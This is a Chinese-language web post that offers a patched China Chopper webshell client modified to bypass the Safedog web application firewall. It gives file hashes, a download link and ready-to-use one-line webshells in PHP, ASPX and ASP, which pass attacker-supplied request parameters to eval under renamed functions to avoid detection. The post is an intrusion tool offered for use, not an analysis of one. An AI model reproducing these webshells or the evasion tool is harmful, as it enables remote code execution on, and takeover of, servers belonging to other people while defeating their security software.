4A14EC-4A154E是用汇编实现的替换eval和base64_decode的函数
004A1562则是这次更新绕过安全狗中国菜刀的内容47A604填0

菜刀绕过安全狗及相关一句话下载-开水网络
过安全狗菜刀

说明:
基于原版中国菜刀20100928的hash

  1. 文件: D:\中国菜刀\chopper.exe
  2. 大小: 200192 字节
  3. 修改时间: 2012年10月20日, 23:11:06
  4. MD5: C05D44DBE353525F492208D891B53875
  5. SHA1: 3D47EA978228DC27AC1F35DE8DE48DFB55FFFDBF
  6. CRC32: 4C1B68CC

修改后的hash

  1. 文件: D:\中国菜刀\chopper_gai.exe
  2. 大小: 200192 字节
  3. 修改时间: 2015年4月16日, 15:16:23
  4. MD5: BE4B29F345BCE7421683C99ABA0E75F6
  5. SHA1: 28E6958A3E095F048F4DC399C53891544E9B2818
  6. CRC32: 54025CC8

总共修改了将近200个字节,因为用的原版的空隙来使用,大小都是200192 字节,所以放心使用。(出自习科某牛)

下载地址:http://pan.baidu.com/s/1kTGHYf1

下面是相关的一句话

Php:

  1. <?php
  2. function xxxx($str){return eval($str);}
  3. function yyyyyyyyyyyyy($str){returnbase64_decode($str);}
  4. xxxx($_POST['pass']); ?>

aspx:

  1. <%@ Page Language="Jscript"validateRequest="false" %>
  2. <%function xxxx(str){returneval(str,"unsafe");}%>
  3. <%var a = Request.Item["ee"];%>
  4. <%var b = xxxx(a);%>
  5. <%Response.Write(b);%>

Asp:

  1. <%
  2. Function xxxx(str)
  3. eval str
  4. End Function
  5. D = request("pass")
  6. xxxx D
  7. %>

内容源自网络,请谨慎使用,后果自付。